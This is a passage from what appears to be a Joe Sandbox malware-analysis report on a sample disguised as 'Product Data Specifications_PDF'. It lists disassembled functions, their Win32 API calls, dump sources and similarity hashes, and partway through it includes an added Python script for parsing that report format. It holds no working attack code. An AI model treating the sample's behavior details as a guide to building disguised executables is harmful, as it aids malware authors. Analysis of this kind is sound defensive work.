                              • GetDlgCtrlID.USER32(00000000), ref: 0046A0E8
                              • PostMessageW.USER32(?,00000111,?,00000000), ref: 0046A13C
                              Strings
                              Memory Dump Source
                              • Source File: 00000006.00000002.1381461965.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000006.00000002.1381447340.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                              • Associated: 00000006.00000002.1381500994.0000000000482000.00000002.00000001.01000000.00000004.sdmp
                              • Associated: 00000006.00000002.1381518159.0000000000490000.00000004.00000001.01000000.00000004.sdmp
                              • Associated: 00000006.00000002.1381574357.0000000000491000.00000008.00000001.01000000.00000004.sdmp
                              • Associated: 00000006.00000002.1381593153.0000000000492000.00000004.00000001.01000000.00000004.sdmp
                              • Associated: 00000006.00000002.1381593153.00000000004A7000.00000004.00000001.01000000.00000004.sdmp
                              • Associated: 00000006.00000002.1381684928.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_400000_Product Data Specifications_PDF.jbxd
                              Similarity
                              • API ID: MessagePost$CtrlFocus
                              • String ID: 0
                              • API String ID: 1534620443-4108050209
                              • Opcode ID: d723a9665293e74c71492fb3cac70a3bc48f92968cf52f94e307062bf2672283
                              • Instruction ID: bf3f5449e9a8ba554bb586fd0597798874618ae7c394ba8af81d11134a55f14d
                              • Opcode Fuzzy Hash: d723a9665293e74c71492fb3cac70a3bc48f92968cf52f94e307062bf2672283
                              • Instruction Fuzzy Hash: 9791AD71604711AFE710CF14D884BABB7A4FB85314F004A1EF991A7381E7B9D895CBAB
                              APIs
                              • DestroyWindow.USER32(?), ref: 004558E3
                              • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00400000,00000000), ref: 0045592C
                              Strings
                              Memory Dump Source
                              • Source File: 00000006.00000002.1381461965.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000006.00000002.1381447340.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                              • Associated: 00000006.00000002.1381500994.0000000000482000.00000002.00000001.01000000.00000004.sdmp
                              • Associated: 00000006.00000002.1381518159.0000000000490000.00000004.00000001.01000000.00000004.sdmp
                              • Associated: 00000006.00000002.1381574357.0000000000491000.00000008.00000001.01000000.00000004.sdmp
                              • Associated: 00000006.00000002.1381593153.0000000000492000.00000004.00000001.01000000.00000004.sdmp
                              • Associated: 00000006.00000002.1381593153.00000000004A7000.00000004.00000001.01000000.00000004.sdmp
                              • Associated: 00000006.00000002.1381684928.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_400000_Product Data Specifications_PDF.jbxd
                              Similarity
                              • API ID: Window$CreateDestroy
                              • String ID: ,$tooltips_class32
                              • API String ID: 1109047481-3856767331
                              • Opcode ID: ae2d9903759a545ce0c494cdefa096f9672d9422e9f4a365a31b4f6ccc33a5ca
                              • Instruction ID: 3e2a402d8ef05c983ab6a33f0f0d51d253aadf8c8a2d9d50fdabec1795fb524a
                              • Opcode Fuzzy Hash: ae2d9903759a545ce0c494cdefa096f9672d9422e9f4a365a31b4f6ccc33a5ca
                              • Instruction Fuzzy Hash: AE71AD71650208AFE720CF58DC84FBA77B8FB59310F20851AFD45AB391DA74AD46CB98
                              APIs
                              • GetMenuItemInfoW.USER32(?,00000007,00000000,00000030), ref: 00468BB1
                              • GetMenuItemCount.USER32(?), ref: 00468C45
                              • DeleteMenu.USER32(?,00000005,00000000,?,?,?), ref: 00468CD9
                              • DeleteMenu.USER32(?,00000004,00000000,?,?), ref: 00468CE2
                              • DeleteMenu.USER32(00000000,00000006,00000000,?,00000004,00000000,?,?), ref: 00468CEB
                              • DeleteMenu.USER32(?,00000003,00000000,?,00000004,00000000,?,?), ref: 00468CF4
                              • GetMenuItemCount.USER32 ref: 00468CFD
                              • SetMenuItemInfoW.USER32(?,00000004,00000000,00000030), ref: 00468D35
                              • GetCursorPos.USER32(?), ref: 00468D3F
                              • SetForegroundWindow.USER32(?), ref: 00468D49
                              • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000,?,?,00000003,00000000,?,00000004,00000000,?,?), ref: 00468D5F
                              • PostMessageW.USER32(?,00000000,00000000,00000000), ref: 00468D6C
                              Strings
                              Memory Dump Source
                              • Source File: 00000006.00000002.1381461965.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000006.00000002.1381447340.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                              • Associated: 00000006.00000002.1381500994.0000000000482000.00000002.00000001.01000000.00000004.sdmp
                              • Associated: 00000006.00000002.1381518159.0000000000490000.00000004.00000001.01000000.00000004.sdmp
                              • Associated: 00000006.00000002.1381574357.0000000000491000.00000008.00000001.01000000.00000004.sdmp
                              • Associated: 00000006.00000002.1381593153.0000000000492000.00000004.00000001.01000000.00000004.sdmp
                              • Associated: 00000006.00000002.1381593153.00000000004A7000.00000004.00000001.01000000.00000004.sdmp
                              • Associated: 00000006.00000002.1381684928.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_400000_Product Data Specifications_PDF.jbxd
                              Similarity
                              • API ID: Menu$DeleteItem$CountInfo$CursorForegroundMessagePopupPostTrackWindow
                              • String ID: 0
                              • API String ID: 1441871840-4108050209
                              • Opcode ID: 12c28d3332ad221b92e3a636ba418a85e822d4b5186b1920d2f56c44304fb3db
                              • Instruction ID: 6d2915cdebcc0779354c8c01805c07fba6dcd836026253be2713676dcba25ca6
                              • Opcode Fuzzy Hash: 12c28d3332ad221b92e3a636ba418a85e822d4b5186b1920d2f56c44304fb3db
                              • Instruction Fuzzy Hash: F571A0B0644300BBE720DB58CC45F5AB7A4AF85724F20470EF5656B3D1DBB8B8448B2A
                              APIs
                              • GetModuleHandleW.KERNEL32(00000000,00000066,?,00000FFF,00000010,00000001,?,?,00427F75,?,0000138C,?,00000001,?,?,?), ref: 004608A9
                              • LoadStringW.USER32(00000000,?,00427F75,?), ref: 004608B0
                                • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                              • GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,?,00427F75,?,0000138C,?,00000001,?,?,?,?,?,00000000), ref: 004608D0
                              • LoadStringW.USER32(00000000,?,00427F75,?), ref: 004608D7
                              • __swprintf.LIBCMT ref: 00460915
                              • __swprintf.LIBCMT ref: 0046092D
                              • _wprintf.LIBCMT ref: 004609E1
                              • MessageBoxW.USER32(00000000,?,?,00011010), ref: 004609FA
                              Strings
                              Memory Dump Source
                              • Source File: 00000006.00000002.1381461965.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000006.00000002.1381447340.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                              • Associated: 00000006.00000002.1381500994.0000000000482000.00000002.00000001.01000000.00000004.sdmp
                              • Associated: 00000006.00000002.1381518159.0000000000490000.00000004.00000001.01000000.00000004.sdmp
                              • Associated: 00000006.00000002.1381574357.0000000000491000.00000008.00000001.01000000.00000004.sdmp
                              • Associated: 00000006.00000002.1381593153.0000000000492000.00000004.00000001.01000000.00000004.sdmp
                              • Associated: 00000006.00000002.1381593153.00000000004A7000.00000004.00000001.01000000.00000004.sdmp
                              • Associated: 00000006.00000002.1381684928.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_400000_Product Data Specifications_PDF.jbxd
                              Similarity
                              • API ID: HandleLoadModuleString__swprintf$Message_memmove_wcslen_wprintf
                              • String ID: Error: $%s (%d) : ==> %s: %s %s$Line %d (File "%s"):$Line %d:$^ ERROR
                              • API String ID: 3631882475-2268648507
                              • Opcode ID: 34748020dcaf007b6c88f6c4c4dd7bf7ecfb2d58ebabdf7d9dae9be74c8fa7b1
                              • Instruction ID: 03c51728676f919c2e33c8c13cfd5c1cee97c3d48cab2dbcdd3400b30208eb52
                              • Opcode Fuzzy Hash: 34748020dcaf007b6c88f6c4c4dd7bf7ecfb2d58ebabdf7d9dae9be74c8fa7b1
                              • Instruction Fuzzy Hash: F5416071900209ABDB00FB91CD46AEF7778AF44314F44447AF50577192EA786E45CBA9
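Every function summary in this report has the same fixed layout: an APIs list (one line per call site with module, arguments and address, plus "Part of subcall function" lines for callees), the Memory Dump Source, and a Similarity block whose String ID joins the function's string literals with "$". The script below is an added example for working with that layout; it is not Joe Sandbox code or output. It parses the summaries into records so the API call sequences and strings can be indexed and compared across samples. The SAMPLE text is constructed from a subset of the entries on this page (the mciSendStringW and OleLoadPicture functions), and api_sequence_digest is our own cheap key, not Joe Sandbox's Opcode ID or Instruction ID.

```python
"""Parse Joe Sandbox "APIs / Similarity" function summaries into records.
Added example, not Joe Sandbox code; SAMPLE is constructed from entries on this page."""
import hashlib
import re
from dataclasses import dataclass, field
from typing import Optional

SECTION_HEADERS = {"APIs", "Strings", "Memory Dump Source", "Joe Sandbox IDA Plugin", "Similarity"}
# "• Name.MODULE(args), ref: ADDR"  /  "• Part of subcall function ADDR: Name.MODULE ref: ADDR"
API_RE = re.compile(
    r"^\s*•\s*(?:Part of subcall function (?P<sub>[0-9A-Fa-f]+):\s*)?"
    r"(?P<name>[A-Za-z_][\w@$?]*)\.(?P<module>[A-Za-z0-9_]+)"
    r"(?:\((?P<args>.*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)\s*$")
KV_RE = re.compile(r"^\s*•\s*(?P<key>[^:]+?):\s*(?P<val>.*)$")  # "• Opcode ID: ..." etc.

SAMPLE = """\
APIs
  • Part of subcall function 00402160: _wcslen.LIBCMT ref: 0040216D
• mciSendStringW.WINMM(status PlayMe mode,?,00000100,00000000), ref: 0045F5D5
• mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 0045F5EC
• mciSendStringW.WINMM(play PlayMe wait,00000000,00000000,00000000), ref: 0045F611
Similarity
• String ID: alias PlayMe$close PlayMe$open $play PlayMe$play PlayMe wait$status PlayMe mode
• API String ID: 369157077-1007645807
• Opcode ID: f963851227cb2bcafec7df3ef8778280fda42e08bc5c03876a4728c3ed9f2a05
APIs
• CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000), ref: 004300C3
• ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 00430105
• OleLoadPicture.OLEAUT32(?,00000000,00000000,004829F8,?), ref: 0043013E
Similarity
• String ID:
• API String ID: 3969911579-0
• Opcode ID: fd1addb57dfcb9cf3c81a7192785a12cb72203be8d3c1966912b6329e8233f20
"""

@dataclass
class ApiCall:
    name: str
    module: str
    args: tuple
    ref: int                          # address of the call site
    subcall_of: Optional[int] = None  # set for "Part of subcall function X" lines

@dataclass
class FunctionEntry:
    calls: list = field(default_factory=list)
    meta: dict = field(default_factory=dict)  # Source File, Opcode ID, String ID, ...

    @property
    def direct_calls(self):               # calls made by this function's own body
        return [c for c in self.calls if c.subcall_of is None]

    @property
    def strings(self):
        # Joe Sandbox joins the literals with "$"; a literal containing "$" is ambiguous.
        return [s for s in self.meta.get("String ID", "").split("$") if s]

def parse_entries(text: str):
    entries, cur = [], None
    for line in text.splitlines():
        stripped = line.strip()
        if stripped == "APIs":            # every function summary opens with "APIs"
            cur = FunctionEntry()
            entries.append(cur)
            continue
        if cur is None or not stripped or stripped in SECTION_HEADERS:
            continue
        m = API_RE.match(line)
        if m:
            args = tuple(a.strip() for a in m["args"].split(",")) if m["args"] is not None else ()
            cur.calls.append(ApiCall(m["name"], m["module"], args, int(m["ref"], 16),
                                     int(m["sub"], 16) if m["sub"] else None))
            continue
        m = KV_RE.match(line)
        if m:
            cur.meta[m["key"].strip()] = m["val"].strip()
    return entries

def index_by_api(entries):
    """Map 'Name.MODULE' -> indexes of the entries whose own body calls it."""
    idx = {}
    for i, e in enumerate(entries):
        for key in sorted({f"{c.name}.{c.module}" for c in e.direct_calls}):
            idx.setdefault(key, []).append(i)
    return idx

def api_sequence_digest(entry) -> str:
    """Our own cross-sample key: SHA-256 of the direct calls in call-site order.
    Not Joe Sandbox's Opcode/Instruction ID, which are computed from instruction bytes."""
    seq = "|".join(f"{c.module}!{c.name}" for c in sorted(entry.direct_calls, key=lambda c: c.ref))
    return hashlib.sha256(seq.encode()).hexdigest()

def entries_with_string(entries, needle: str):
    return [i for i, e in enumerate(entries) if any(needle in s for s in e.strings)]

if __name__ == "__main__":
    for i, e in enumerate(parse_entries(SAMPLE)):
        print(i, api_sequence_digest(e)[:16], [c.name for c in e.direct_calls], e.strings)
```

Feed the script the text export of the whole "Disassembly" section instead of SAMPLE and index_by_api gives a quick answer to questions such as "which functions call mciSendStringW or OleLoadPicture", while entries_with_string locates the function that owns a given literal. Lines that match neither pattern are skipped, so the Strings header and the Associated dump lines do not disturb the parse.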
                              APIs
                              • ExtractIconExW.SHELL32(?,?,?,?,00000001), ref: 004716C7
                              • ExtractIconExW.SHELL32(?,000000FF,?,?,00000001), ref: 004716E1
                              • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00471711
                              • SendMessageW.USER32 ref: 00471740
                              • ImageList_Create.COMCTL32(00000010,00000010,00000021,?,00000001,?,?,?,?,?,?,?,?,?,?,00001053), ref: 00471779
                              • SendMessageW.USER32(?,00001003,00000001,00000000), ref: 0047179A
                              • ImageList_Create.COMCTL32(00000020,00000020,00000021,00000000,00000001,?,?,?,?,?,?,?,?,?,?,00001053), ref: 004717B0
                              • SendMessageW.USER32(?,00001003,00000000,00000000), ref: 004717D3
                              • ImageList_ReplaceIcon.COMCTL32(?,000000FF,?,?,?,?,?,?,?,?,?,?,?,00001053,000000FF,?), ref: 004717F8
                              • ImageList_ReplaceIcon.COMCTL32(00000000,000000FF,?,?,?,?,?,?,?,?,?,?,?,00001053,000000FF,?), ref: 00471807
                              • SendMessageW.USER32 ref: 0047184F
                              • SendMessageW.USER32(?,0000104C,00000000,00000002), ref: 00471872
                              • SendMessageW.USER32(?,00001015,00000000,00000000), ref: 00471890
                              • DestroyIcon.USER32(?,?,?,?,?,?,?,?,?,?,?,00001053,000000FF,?), ref: 0047189C
                              • DestroyIcon.USER32(?,?,?,?,?,?,?,?,?,?,?,00001053,000000FF,?), ref: 004718A2
                              Memory Dump Source
                              • Source File: 00000006.00000002.1381461965.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000006.00000002.1381447340.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                              • Associated: 00000006.00000002.1381500994.0000000000482000.00000002.00000001.01000000.00000004.sdmp
                              • Associated: 00000006.00000002.1381518159.0000000000490000.00000004.00000001.01000000.00000004.sdmp
                              • Associated: 00000006.00000002.1381574357.0000000000491000.00000008.00000001.01000000.00000004.sdmp
                              • Associated: 00000006.00000002.1381593153.0000000000492000.00000004.00000001.01000000.00000004.sdmp
                              • Associated: 00000006.00000002.1381593153.00000000004A7000.00000004.00000001.01000000.00000004.sdmp
                              • Associated: 00000006.00000002.1381684928.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_400000_Product Data Specifications_PDF.jbxd
                              Similarity
                              • API ID: MessageSend$Icon$ImageList_$CreateDestroyExtractReplace
                              • String ID:
                              • API String ID: 4116747274-0
                              • Opcode ID: 0980e37b37b59800b468ddf3c96ce45e1e3e21a553a40365caf2b501cbb695b2
                              • Instruction ID: aa77b4eb3e0d334a4980849760fe45b072e458157f6a66894e70986bfe60c355
                              • Opcode Fuzzy Hash: 0980e37b37b59800b468ddf3c96ce45e1e3e21a553a40365caf2b501cbb695b2
                              • Instruction Fuzzy Hash: 39617D75A00209AFEB10DF68CD85FEEB7B4FB48710F10855AF618AB2D0D7B4A981CB54
                              APIs
                              • GetClassNameW.USER32(?,?,00000100), ref: 00461678
                              • _wcslen.LIBCMT ref: 00461683
                              • __swprintf.LIBCMT ref: 00461721
                              • SendMessageTimeoutW.USER32(?,?,00000101,00000000,00000002,00001388,?), ref: 00461794
                              • GetClassNameW.USER32(?,?,00000400), ref: 00461811
                              • GetDlgCtrlID.USER32(?), ref: 00461869
                              • GetWindowRect.USER32(?,?), ref: 004618A4
                              • GetParent.USER32(?), ref: 004618C3
                              • ScreenToClient.USER32(00000000), ref: 004618CA
                              • GetClassNameW.USER32(?,?,00000100), ref: 00461941
                              • GetWindowTextW.USER32(?,?,00000400), ref: 0046197E
                              Strings
                              Memory Dump Source
                              • Source File: 00000006.00000002.1381461965.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000006.00000002.1381447340.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                              • Associated: 00000006.00000002.1381500994.0000000000482000.00000002.00000001.01000000.00000004.sdmp
                              • Associated: 00000006.00000002.1381518159.0000000000490000.00000004.00000001.01000000.00000004.sdmp
                              • Associated: 00000006.00000002.1381574357.0000000000491000.00000008.00000001.01000000.00000004.sdmp
                              • Associated: 00000006.00000002.1381593153.0000000000492000.00000004.00000001.01000000.00000004.sdmp
                              • Associated: 00000006.00000002.1381593153.00000000004A7000.00000004.00000001.01000000.00000004.sdmp
                              • Associated: 00000006.00000002.1381684928.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_400000_Product Data Specifications_PDF.jbxd
                              Similarity
                              • API ID: ClassName$Window$ClientCtrlMessageParentRectScreenSendTextTimeout__swprintf_wcslen
                              • String ID: %s%u
                              • API String ID: 1899580136-679674701
                              • Opcode ID: 766f23a74968ff95f09f311a42cbe987384f70ffc1712f5abd724c40a01aa324
                              • Instruction ID: 362d1c13b2509f288ecdbc272899e32e1bd8f20a7ba75cfa55bfcaf2deda5cb5
                              • Opcode Fuzzy Hash: 766f23a74968ff95f09f311a42cbe987384f70ffc1712f5abd724c40a01aa324
                              • Instruction Fuzzy Hash: 1DA1B2715043019FDB10DF55C884BAB73A8FF84314F08896EFD899B255E738E94ACBA6
                              APIs
                              • GetMenuItemInfoW.USER32(?,FFFFFFFF,00000000,00000030), ref: 0045FDDB
                              • SetMenuItemInfoW.USER32(00000008,00000004,00000000,00000030), ref: 0045FE14
                              • Sleep.KERNEL32(000001F4,?,FFFFFFFF,00000000,00000030,?,?,?,?,?,?), ref: 0045FE26
                              Strings
                              Memory Dump Source
                              • Source File: 00000006.00000002.1381461965.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000006.00000002.1381447340.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                              • Associated: 00000006.00000002.1381500994.0000000000482000.00000002.00000001.01000000.00000004.sdmp
                              • Associated: 00000006.00000002.1381518159.0000000000490000.00000004.00000001.01000000.00000004.sdmp
                              • Associated: 00000006.00000002.1381574357.0000000000491000.00000008.00000001.01000000.00000004.sdmp
                              • Associated: 00000006.00000002.1381593153.0000000000492000.00000004.00000001.01000000.00000004.sdmp
                              • Associated: 00000006.00000002.1381593153.00000000004A7000.00000004.00000001.01000000.00000004.sdmp
                              • Associated: 00000006.00000002.1381684928.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_400000_Product Data Specifications_PDF.jbxd
                              Similarity
                              • API ID: InfoItemMenu$Sleep
                              • String ID: 0
                              • API String ID: 1196289194-4108050209
                              • Opcode ID: c65cffcb0b41bccfc2e749f507a7067f69681543840726e93d819a57ffaed043
                              • Instruction ID: 163fe6e236f433162160dce37f71c375d73f8c96772172175a1e07f10d517f7e
                              • Opcode Fuzzy Hash: c65cffcb0b41bccfc2e749f507a7067f69681543840726e93d819a57ffaed043
                              • Instruction Fuzzy Hash: 12710172500244ABDB20CF55EC49FAFBBA8EB95316F00842FFD0197292C374A94DCB69
                              APIs
                              • GetDC.USER32(00000000), ref: 0043143E
                              • CreateCompatibleBitmap.GDI32(00000000,?,?), ref: 0043144F
                              • CreateCompatibleDC.GDI32(00000000), ref: 00431459
                              • SelectObject.GDI32(00000000,?), ref: 00431466
                              • StretchBlt.GDI32(00000000,00000000,00000000,?,?,?,?,?,?,?,00CC0020), ref: 004314CC
                              • GetDIBits.GDI32(00000000,?,00000000,00000000,00000000,?,00000000), ref: 00431505
                              Strings
                              Memory Dump Source
                              • Source File: 00000006.00000002.1381461965.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000006.00000002.1381447340.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                              • Associated: 00000006.00000002.1381500994.0000000000482000.00000002.00000001.01000000.00000004.sdmp
                              • Associated: 00000006.00000002.1381518159.0000000000490000.00000004.00000001.01000000.00000004.sdmp
                              • Associated: 00000006.00000002.1381574357.0000000000491000.00000008.00000001.01000000.00000004.sdmp
                              • Associated: 00000006.00000002.1381593153.0000000000492000.00000004.00000001.01000000.00000004.sdmp
                              • Associated: 00000006.00000002.1381593153.00000000004A7000.00000004.00000001.01000000.00000004.sdmp
                              • Associated: 00000006.00000002.1381684928.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_400000_Product Data Specifications_PDF.jbxd
                              Similarity
                              • API ID: CompatibleCreate$BitmapBitsObjectSelectStretch
                              • String ID: (
                              • API String ID: 3300687185-3887548279
                              • Opcode ID: 553542ef25fd9631a2b80eb5934e7fdfb419610406a61b9b58c1a15d590a9b60
                              • Instruction ID: 70523424e9a4c52fdd53d867b9eeb1eac2d89839f103c71a78559f5a5eece38f
                              • Opcode Fuzzy Hash: 553542ef25fd9631a2b80eb5934e7fdfb419610406a61b9b58c1a15d590a9b60
                              • Instruction Fuzzy Hash: 63514971A00209AFDB14CF98C884FAFBBB8EF49310F10891DFA5997290D774A940CBA4
                              APIs
                                • Part of subcall function 004536F7: CharLowerBuffW.USER32(?,?), ref: 0045370C
                                • Part of subcall function 00445AE0: _wcslen.LIBCMT ref: 00445AF0
                              • GetDriveTypeW.KERNEL32 ref: 0045DB32
                              • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0045DB78
                              • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0045DBB3
                              • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0045DBED
                                • Part of subcall function 00402160: _wcslen.LIBCMT ref: 0040216D
                                • Part of subcall function 00402160: _memmove.LIBCMT ref: 00402193
                              Strings
                              Memory Dump Source
                              • Source File: 00000006.00000002.1381461965.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000006.00000002.1381447340.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                              • Associated: 00000006.00000002.1381500994.0000000000482000.00000002.00000001.01000000.00000004.sdmp
                              • Associated: 00000006.00000002.1381518159.0000000000490000.00000004.00000001.01000000.00000004.sdmp
                              • Associated: 00000006.00000002.1381574357.0000000000491000.00000008.00000001.01000000.00000004.sdmp
                              • Associated: 00000006.00000002.1381593153.0000000000492000.00000004.00000001.01000000.00000004.sdmp
                              • Associated: 00000006.00000002.1381593153.00000000004A7000.00000004.00000001.01000000.00000004.sdmp
                              • Associated: 00000006.00000002.1381684928.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_400000_Product Data Specifications_PDF.jbxd
                              Similarity
                              • API ID: SendString$_wcslen$BuffCharDriveLowerType_memmove
                              • String ID: type cdaudio alias cd wait$ wait$close$close cd wait$closed$open$open $set cd door
                              • API String ID: 1976180769-4113822522
                              • Opcode ID: a85f7e6fea3b256bd08f49877ae03d0a36a67fa55ca674d77d79428d7feae10a
                              • Instruction ID: 81dc6b2e9a5b1b7ac5bd11c7175921e379baf9e0c2b27e14ed053c07c028f3b1
                              • Opcode Fuzzy Hash: a85f7e6fea3b256bd08f49877ae03d0a36a67fa55ca674d77d79428d7feae10a
                              • Instruction Fuzzy Hash: 75516E715043049FD710EF21C981B5EB3E4BF88304F14896FF995AB292D7B8E909CB5A
                              APIs
                              Memory Dump Source
                              • Source File: 00000006.00000002.1381461965.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000006.00000002.1381447340.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                              • Associated: 00000006.00000002.1381500994.0000000000482000.00000002.00000001.01000000.00000004.sdmp
                              • Associated: 00000006.00000002.1381518159.0000000000490000.00000004.00000001.01000000.00000004.sdmp
                              • Associated: 00000006.00000002.1381574357.0000000000491000.00000008.00000001.01000000.00000004.sdmp
                              • Associated: 00000006.00000002.1381593153.0000000000492000.00000004.00000001.01000000.00000004.sdmp
                              • Associated: 00000006.00000002.1381593153.00000000004A7000.00000004.00000001.01000000.00000004.sdmp
                              • Associated: 00000006.00000002.1381684928.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_400000_Product Data Specifications_PDF.jbxd
                              Similarity
                              • API ID: _wcslen$_wcsncpy$LocalTime__fassign
                              • String ID:
                              • API String ID: 461458858-0
                              • Opcode ID: 26761b0a7209b856481a9ddbc8736091f87f92f0ac2320453e44697a96ade7e6
                              • Instruction ID: 9848deb76f2cd1bd94a84263f46e444e1138d8b87e7a9916e51222e649cc75ea
                              • Opcode Fuzzy Hash: 26761b0a7209b856481a9ddbc8736091f87f92f0ac2320453e44697a96ade7e6
                              • Instruction Fuzzy Hash: B1417372D10204B6CF10EFA5C946ADFF3B8DF49314F90885BE909E3121F6B4E65583A9
                              APIs
                              • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000), ref: 004300C3
                              • GetFileSize.KERNEL32(00000000,00000000), ref: 004300DE
                              • GlobalAlloc.KERNEL32(00000002,00000000), ref: 004300E9
                              • GlobalLock.KERNEL32(00000000), ref: 004300F6
                              • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 00430105
                              • GlobalUnlock.KERNEL32(00000000), ref: 0043010C
                              • CloseHandle.KERNEL32(00000000), ref: 00430113
                              • CreateStreamOnHGlobal.OLE32(00000000,00000001,?), ref: 00430120
                              • OleLoadPicture.OLEAUT32(?,00000000,00000000,004829F8,?), ref: 0043013E
                              • GlobalFree.KERNEL32(00000000), ref: 00430150
                              • GetObjectW.GDI32(?,00000018,?), ref: 00430177
                              • CopyImage.USER32(?,00000000,?,?,00002000), ref: 004301A8
                              • DeleteObject.GDI32(?), ref: 004301D0
                              • SendMessageW.USER32(?,00000172,00000000,00000000), ref: 004301E7
                              Memory Dump Source
                              • Source File: 00000006.00000002.1381461965.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000006.00000002.1381447340.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                              • Associated: 00000006.00000002.1381500994.0000000000482000.00000002.00000001.01000000.00000004.sdmp
                              • Associated: 00000006.00000002.1381518159.0000000000490000.00000004.00000001.01000000.00000004.sdmp
                              • Associated: 00000006.00000002.1381574357.0000000000491000.00000008.00000001.01000000.00000004.sdmp
                              • Associated: 00000006.00000002.1381593153.0000000000492000.00000004.00000001.01000000.00000004.sdmp
                              • Associated: 00000006.00000002.1381593153.00000000004A7000.00000004.00000001.01000000.00000004.sdmp
                              • Associated: 00000006.00000002.1381684928.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_400000_Product Data Specifications_PDF.jbxd
                              Similarity
                              • API ID: Global$File$CreateObject$AllocCloseCopyDeleteFreeHandleImageLoadLockMessagePictureReadSendSizeStreamUnlock
                              • String ID:
                              • API String ID: 3969911579-0
                              • Opcode ID: fd1addb57dfcb9cf3c81a7192785a12cb72203be8d3c1966912b6329e8233f20
                              • Instruction ID: 40287395d2d29e4935595b2baf4d6657c54b4003bec4d35786bf86d2452689d1
                              • Opcode Fuzzy Hash: fd1addb57dfcb9cf3c81a7192785a12cb72203be8d3c1966912b6329e8233f20
                              • Instruction Fuzzy Hash: 41414C75600208AFDB10DF64DD88FAE77B8EF48711F108659FA05AB290D7B5AD01CB68
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000006.00000002.1381461965.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000006.00000002.1381447340.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                              • Associated: 00000006.00000002.1381500994.0000000000482000.00000002.00000001.01000000.00000004.sdmp
                              • Associated: 00000006.00000002.1381518159.0000000000490000.00000004.00000001.01000000.00000004.sdmp
                              • Associated: 00000006.00000002.1381574357.0000000000491000.00000008.00000001.01000000.00000004.sdmp
                              • Associated: 00000006.00000002.1381593153.0000000000492000.00000004.00000001.01000000.00000004.sdmp
                              • Associated: 00000006.00000002.1381593153.00000000004A7000.00000004.00000001.01000000.00000004.sdmp
                              • Associated: 00000006.00000002.1381684928.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_400000_Product Data Specifications_PDF.jbxd
                              Similarity
                              • API ID: Menu$Delete$Destroy$ItemObject$CountDrawIconInfoWindow
                              • String ID: 0
                              • API String ID: 956284711-4108050209
